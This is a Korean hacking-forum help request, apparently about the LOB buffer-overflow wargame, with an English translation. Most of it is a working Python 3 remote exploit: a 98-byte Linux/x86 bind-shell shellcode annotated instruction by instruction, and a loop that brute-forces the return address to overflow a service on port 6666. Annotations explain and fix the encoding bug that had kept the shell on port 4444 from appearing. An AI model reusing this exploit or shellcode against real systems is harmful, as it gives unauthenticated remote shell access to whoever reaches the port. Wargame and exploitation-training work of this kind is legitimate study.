http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=36205
진짜 혼자서 어떻게든 해결해보려 했는데 도저히 모르겠네요.
물어볼 곳이 없어서 ㅠㅠ 여기서라도 물어봅니다.
아래는 작성한 파이썬3 코드입니다. 코드 돌리고,
$ telnet LOB서버주소 4444 하는데 자꾸 connection refused 뜨네요.
왜 그런 건지 모르겠어요. 쉘코드가 문제인 건지.. 답답합니다.
(English: I really tried to work this out on my own but I just can't figure it out. I have nowhere else to ask, so I'm asking here. Below is the Python 3 code I wrote. I run it and then `$ telnet <LOB server address> 4444`, but I keep getting "connection refused". I don't know why — maybe the shellcode is the problem. It's frustrating.)
import socket
import struct
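def p32(x: int) -> bytes:
    """Pack *x* as a 4-byte little-endian unsigned integer (x86 stack word).

    Returns ``bytes``, not ``str``: in Python 3 the result must be concatenated
    into a ``bytes`` payload. Wrapping it in ``str()`` yields the text repr
    ``"b'\\xff...'"`` (7+ characters), not the four raw bytes, which silently
    misaligns the overwritten return address.

    Raises ``struct.error`` if *x* is outside ``0..0xffffffff``.
    """
    return struct.pack('<I', x)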
# Bind shellcode — Linux/x86 (32-bit), 98 bytes. Read off the bytes below:
#   socketcall(SYS_SOCKET=1, {AF_INET, SOCK_STREAM, 0})        -> esi = listening fd
#   socketcall(SYS_BIND=2,   {esi, {AF_INET, port 4444, 0.0.0.0}, 16})
#   socketcall(SYS_LISTEN=4, {esi, 0})
#   socketcall(SYS_ACCEPT=5, {esi, NULL, NULL})                -> ebx = client fd
#   dup2(ebx, cl) for cl = 3, 2, 1, 0 (dec cl / jns loop), then
#   execve("//bin/sh", ["//bin/sh"], NULL)
#
# It is written as a Python 3 `str` of \xNN escapes. Before it goes on the wire it
# must become bytes via .encode("latin-1"), which maps each code point 0x00-0xff to
# the single byte of the same value. A bare .encode() is UTF-8 and expands every
# byte >= 0x80 (e.g. \xcd\x80 = int 0x80) into two bytes, destroying the code.
#
# Security caveat: sin_addr is 0 (INADDR_ANY) and there is no authentication —
# whoever reaches TCP/4444 first gets the shell. accept() is called exactly once and
# the accepted socket becomes stdin/stdout/stderr of /bin/sh, so closing that first
# connection ends the shell. Use only on an isolated lab network.
shellcode = ""
# xor eax,eax; xor ebx,ebx; push eax; mov al,0x66; mov bl,1; push ebx; push 2; mov ecx,esp; int 0x80  (socket)
# mov esi,eax; xor edx,edx; push edx (sin_addr = 0.0.0.0); then the port word is pushed next
shellcode += "\x31\xc0\x31\xdb\x50\xb0\x66\xb3\x01\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x31\xd2\x52\x66\x68"
# 0x115c = 4444 in network byte order; the telnet/nc client must connect to this port
shellcode += "\x11\x5c" # port number 4444
# push word 2 (AF_INET); mov ecx,esp; mov al,0x66; mov bl,2; push 16; push ecx; push esi; mov ecx,esp; int 0x80  (bind)
# mov al,0x66; mov bl,4; push edx; push esi  (listen args)
shellcode += "\x66\x6a\x02\x89\xe1\xb0\x66\xb3\x02\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56"
# mov ecx,esp; int 0x80 (listen); mov al,0x66; mov bl,5; push edx; push edx; push esi; mov ecx,esp; int 0x80 (accept)
# mov ebx,eax (client fd); xor ecx,ecx; mov cl,3; mov al,0x3f (dup2)
shellcode += "\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xb0\x3f"
# int 0x80; dec cl; jns -8 (back to mov al,0x3f: dup2 onto fds 3..0); mov al,0xb (execve)
# push edx; push "n/sh"; push "//bi"; mov ebx,esp; push edx; push ebx
shellcode += "\xcd\x80\xfe\xc9\x79\xf8\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53"
# mov ecx,esp; int 0x80  (execve)
shellcode += "\x89\xe1\xcd\x80"
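# Why the original never produced a listener on 4444: the payload was assembled
# as a `str` and then `.encode()`d. That (a) turned `str(p32(i))` into the 7+
# character repr "b'\xff\xff\xff\xbf'" instead of 4 raw bytes, shifting the
# return-address overwrite, and (b) UTF-8-encoded every shellcode byte >= 0x80
# into two bytes, so the injected code was garbage. Everything below is `bytes`.
TARGET_HOST = 'LOB서버주소'   # placeholder: replace with the LOB server address
TARGET_PORT = 6666            # vulnerable service being overflowed
OFFSET_TO_RET = 44            # filler bytes before the saved return address
NOP_SLED_LEN = 100
# Walk the stack top-down. The step may exceed 1 because any guess landing
# inside the 100-byte NOP sled still slides into the shellcode, so it must stay
# smaller than NOP_SLED_LEN. Assumes a non-randomised stack in 0xbfffxxxx
# (LOB-style target) — confirm on the actual VM.
RET_ADDR_START = 0xbfffffff
RET_ADDR_END = 0xbfff0000
RET_ADDR_STEP = 48

for ret_addr in range(RET_ADDR_START, RET_ADDR_END, -RET_ADDR_STEP):
    print("Trying to RET_addr : {}".format(hex(ret_addr)))
    # `shellcode` is a str of \xNN escapes; latin-1 maps each code point
    # 0x00-0xff to the single byte of the same value, recovering the exact
    # machine code (UTF-8 would not).
    payload = (
        b"A" * OFFSET_TO_RET
        + p32(ret_addr)
        + b"\x90" * NOP_SLED_LEN
        + shellcode.encode("latin-1")
    )
    # IPv4 / TCP. The context manager closes the socket even if connect() or
    # sendall() raises, instead of leaking a descriptor per failed attempt.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client_socket:
        client_socket.connect((TARGET_HOST, TARGET_PORT))
        # sendall() loops until the whole payload is written; send() may
        # write only a prefix and the overflow would then be truncated.
        client_socket.sendall(payload)
    # Do NOT probe port 4444 from here to detect success: the shellcode
    # accept()s exactly once and execve()s /bin/sh on that connection, so a
    # probe would consume (and on close, kill) the shell. Connect manually
    # with telnet/nc once the loop has run.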